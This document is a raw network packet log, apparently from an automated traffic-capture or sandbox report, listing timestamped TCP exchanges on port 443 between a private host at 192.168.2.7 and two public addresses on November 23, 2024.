                                                                                                                                                                                  Nov 23, 2024 19:54:07.147937059 CET4435004913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.147994041 CET50049443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.148032904 CET50049443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.148042917 CET4435004913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.148052931 CET50049443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.148057938 CET4435004913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.150727034 CET50054443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.150767088 CET4435005413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.150830030 CET50054443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.150964022 CET50054443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.150978088 CET4435005413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.235106945 CET4435005013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.235709906 CET50050443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.235728025 CET4435005013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.236191034 CET50050443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.236197948 CET4435005013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.769129038 CET4435005013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.772341013 CET4435005013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.772443056 CET50050443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.772466898 CET4435005013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.772496939 CET4435005013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.772592068 CET50050443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.772592068 CET50050443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.773833036 CET50050443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.773847103 CET4435005013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.777750015 CET50055443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.777796984 CET4435005513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:07.777965069 CET50055443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.778439999 CET50055443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:07.778458118 CET4435005513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.306087971 CET4435005113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.306704044 CET50051443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.306725979 CET4435005113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.307159901 CET50051443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.307166100 CET4435005113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.336658001 CET4435005213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.337167978 CET50052443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.337182045 CET4435005213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.337538004 CET50052443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.337542057 CET4435005213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.384474993 CET4435005313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.384958029 CET50053443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.384983063 CET4435005313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.385368109 CET50053443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.385375023 CET4435005313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.738923073 CET4435005113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.741920948 CET4435005113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.741995096 CET50051443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.742033005 CET50051443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.742044926 CET4435005113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.742058039 CET50051443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.742064953 CET4435005113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.744731903 CET50056443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.744772911 CET4435005613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.744849920 CET50056443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.744990110 CET50056443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.745007992 CET4435005613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.802130938 CET4435005213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.802172899 CET4435005213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.802236080 CET4435005213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.802257061 CET50052443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.802341938 CET50052443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.802613974 CET50052443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.802629948 CET4435005213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.802659988 CET50052443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.802664995 CET4435005213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.805324078 CET50057443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.805372953 CET4435005713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.805464029 CET50057443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.805602074 CET50057443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.805619955 CET4435005713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.844808102 CET4435005313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.848386049 CET4435005313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.848524094 CET50053443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.848598957 CET50053443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.848612070 CET4435005313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.848628998 CET50053443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.848634958 CET4435005313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.851644039 CET50058443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.851671934 CET4435005813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:08.851754904 CET50058443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.851905107 CET50058443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:08.851917982 CET4435005813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.093219995 CET4435005413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.093682051 CET50054443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.093694925 CET4435005413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.094161034 CET50054443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.094166040 CET4435005413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.546235085 CET4435005413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.549361944 CET4435005413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.549417019 CET4435005413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.549422979 CET50054443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.549473047 CET50054443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.549525976 CET50054443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.549546957 CET4435005413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.549562931 CET50054443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.549570084 CET4435005413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.552285910 CET50059443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.552331924 CET4435005913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.552448034 CET50059443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.552642107 CET50059443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.552684069 CET4435005913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.566239119 CET4435005513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.566602945 CET50055443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.566632986 CET4435005513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:09.567009926 CET50055443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:09.567018986 CET4435005513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.175757885 CET4435005513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.179140091 CET4435005513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.179260015 CET50055443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.179308891 CET50055443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.179342031 CET4435005513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.179346085 CET50055443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.179354906 CET4435005513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.182111979 CET50060443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.182148933 CET4435006013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.182218075 CET50060443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.182351112 CET50060443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.182362080 CET4435006013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.611998081 CET4435005813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.612683058 CET50058443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.612694979 CET4435005813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.613787889 CET50058443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.613792896 CET4435005813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.631536961 CET4435005713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.632117033 CET50057443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.632148027 CET4435005713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.632558107 CET50057443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.632589102 CET4435005713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.634757996 CET4435005613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.635123968 CET50056443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.635143042 CET4435005613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:10.635549068 CET50056443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:10.635556936 CET4435005613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.110184908 CET4435005813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.113260031 CET4435005813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.113317013 CET4435005813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.113332033 CET50058443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.113368988 CET50058443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.113435030 CET50058443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.113445044 CET4435005813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.113498926 CET50058443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.113531113 CET4435005813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.116964102 CET4435005613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.117259979 CET50061443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.117284060 CET4435006113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.117366076 CET50061443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.117587090 CET50061443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.117599010 CET4435006113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.120790958 CET4435005613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.120856047 CET50056443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.120908022 CET50056443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.120914936 CET4435005613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.120930910 CET50056443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.120934010 CET4435005613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.121402979 CET4435005713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.123550892 CET50062443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.123585939 CET4435006213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.123680115 CET50062443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.123857975 CET50062443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.123876095 CET4435006213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.124699116 CET4435005713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.124768972 CET50057443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.124840975 CET50057443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.124840975 CET50057443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.124881029 CET4435005713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.124912977 CET4435005713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.127427101 CET50063443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.127440929 CET4435006313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.127518892 CET50063443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.127677917 CET50063443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.127687931 CET4435006313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.285945892 CET44350038172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.286037922 CET44350038172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.286098003 CET50038443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:54:11.458226919 CET4435005913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.458806992 CET50059443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.458836079 CET4435005913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:11.459511995 CET50059443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:11.459517002 CET4435005913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.024333000 CET4435005913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.024425030 CET4435005913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.024493933 CET50059443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.024718046 CET50059443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.024739981 CET4435005913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.024751902 CET50059443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.024758101 CET4435005913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.028541088 CET50064443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.028563976 CET4435006413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.028645039 CET50064443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.028856993 CET50064443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.028868914 CET4435006413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.109529972 CET4435006013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.110112906 CET50060443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.110130072 CET4435006013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.110755920 CET50060443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.110779047 CET4435006013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.587271929 CET50038443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:54:12.587301970 CET44350038172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.671098948 CET4435006013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.674916029 CET4435006013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.674983025 CET50060443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.675107956 CET50060443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.675107956 CET50060443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.675126076 CET4435006013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.675143003 CET4435006013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.679660082 CET50065443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.679670095 CET4435006513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:12.679744005 CET50065443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.679959059 CET50065443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:12.679971933 CET4435006513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.126265049 CET4435006113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.127043009 CET50061443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.127065897 CET4435006113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.127691984 CET50061443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.127697945 CET4435006113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.194804907 CET4435006313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.195576906 CET50063443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.195589066 CET4435006313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.197388887 CET50063443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.197398901 CET4435006313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.211169958 CET4435006213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.212039948 CET50062443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.212054968 CET4435006213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.212656021 CET50062443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.212662935 CET4435006213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.752974987 CET4435006313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.760742903 CET4435006313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.760844946 CET50063443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.760973930 CET50063443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.760993004 CET4435006313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.761003971 CET50063443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.761013985 CET4435006313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.762620926 CET4435006213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.763439894 CET4435006113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.764923096 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.764971972 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.765043020 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.765222073 CET50066443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.765240908 CET4435006613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.767368078 CET4435006113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.767438889 CET50061443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.767472982 CET50061443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.767478943 CET4435006113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.767491102 CET50061443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.767493963 CET4435006113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.770076036 CET4435006213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.770215988 CET50062443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.770328045 CET50062443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.770328045 CET50062443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.770348072 CET4435006213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.770360947 CET4435006213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.770770073 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.770797968 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.770921946 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.771781921 CET50067443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.771795988 CET4435006713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.773082018 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.773101091 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.773236990 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.773492098 CET50068443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.773504972 CET4435006813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.888828039 CET4435006413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.891908884 CET50064443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.891933918 CET4435006413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:13.892580986 CET50064443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:13.892587900 CET4435006413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:14.406864882 CET4435006413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:14.409991026 CET4435006413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:14.410079956 CET50064443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:14.410172939 CET50064443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:14.410190105 CET4435006413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:14.410204887 CET50064443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:14.410211086 CET4435006413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:14.414166927 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:14.414199114 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:14.414405107 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:14.414472103 CET50069443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:14.414479971 CET4435006913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:14.729862928 CET4435006513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:14.730586052 CET50065443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:14.730601072 CET4435006513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:14.731432915 CET50065443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:14.731437922 CET4435006513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.193955898 CET4435006513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.197953939 CET4435006513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.200436115 CET50065443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.200541019 CET50065443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.200551033 CET4435006513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:54:15.200562954 CET50065443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:54:15.200570107 CET4435006513.107.246.63192.168.2.7
